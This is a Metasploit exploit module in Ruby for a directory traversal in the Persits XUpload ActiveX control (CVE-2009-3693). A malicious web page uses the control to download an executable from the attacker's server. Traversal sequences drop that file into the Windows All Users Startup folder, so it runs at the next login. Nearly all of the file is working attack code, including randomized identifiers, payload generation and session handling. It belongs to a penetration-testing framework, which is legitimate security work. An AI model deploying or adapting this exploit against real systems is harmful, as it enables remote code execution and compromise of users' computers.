Persits XUpload ActiveX MakeHttpRequest Directory Traversal

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Persits XUpload ActiveX MakeHttpRequest Directory Traversal',
      'Description'    => %q{
          This module exploits a directory traversal in Persits Software Inc's
        XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.
        By passing a string containing "..\\" sequences to the MakeHttpRequest method,
        an attacker is able to write arbitrary files to arbitrary locations on disk.

        Code execution occurs by writing to the All Users Startup Programs directory.
        You may want to combine this module with the use of exploit/multi/handler since a
        user would have to log for the payload to execute.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2009-3693'],
          [ 'OSVDB', '60001']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 2048,
          'Compat'   =>
            {
              'ConnectionType' => '-find',
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic',  { } ],
        ],
      'DisclosureDate' => '2009-09-29',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('PATH', [ true, 'The path to place the executable.', '../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']),
      ])
  end

  def on_request_uri(cli, request)

    uri,token = request.uri.split('?', 2)

    print_status("request fired : #{uri}")

    if !token
      # randomize some stuff
      objid = rand_text_alpha(rand(100) + 1)
      func = rand_text_alpha(rand(100) + 1)

      # send the html that makes the payload get downloaded
      token = rand_text_numeric(32)
      if ("/" == get_resource[-1,1])
        exe_uri = get_resource[0, get_resource.length - 1]
      else
        exe_uri = get_resource
      end
      exe_uri << "?" + token

      exe_host = ""
      exe_host << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])

      exe_hostport = datastore['SRVPORT']

      exe_name = datastore['PATH'].dup
      exe_name << rand_text_alphanumeric(rand(100) + 1)
      exe_name << ".exe"

      html = %Q|<html>
<head>
<script language='javascript'>
function #{func}()
{
#{objid}.Server = "#{exe_host}";
#{objid}.Script = "#{exe_uri}";
#{objid}.Port = #{exe_hostport};
#{objid}.MakeHttpRequest("","","#{exe_name}","","")
}
</script>
</head>
<body onload='javascript:#{func}()'>
<object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id=#{objid}></object>
</body>
</html>
|
      print_status("Sending #{self.name}")

      # Transmit the response to the client
      send_response(cli, html,
        {
          'Connection'   => 'close',
          'Pragma'       => 'no-cache'
        })
      return
    end

    print_status("Sending payload EXE")
    return if ((p = regenerate_payload(cli)) == nil)
    data = generate_payload_exe({ :code => p.encoded })

    # send the exe
    send_response(cli, data,
      {
        'Content-Type' => 'application/octet-stream',
        'Connection'   => 'close',
        'Pragma'       => 'no-cache'
      })

    # Handle the payload
    handler(cli)
  end
end